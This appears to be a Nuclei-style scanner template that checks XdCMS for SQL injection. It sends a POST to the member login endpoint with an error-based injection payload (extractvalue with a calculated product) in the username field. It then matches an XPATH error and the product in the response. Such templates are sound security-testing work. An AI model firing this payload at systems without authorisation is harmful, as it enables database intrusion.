id: xdcms-sqli

info:
  name: XdCMS SQL Injection
  author: pikpikcu
  severity: high
  reference: https://www.uedbox.com/post/35188/
  tags: sqli,xdcms

requests:
  - method: POST
    path:
      - "{{BaseURL}}/index.php?m=member&f=login_save"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Content-Type: text/html"
        part: header

      - type: word
        words:
          - "707564257851522176"
          - "XPATH syntax error:"
        part: body
        condition: and

      - type: status
        status:
          - 200
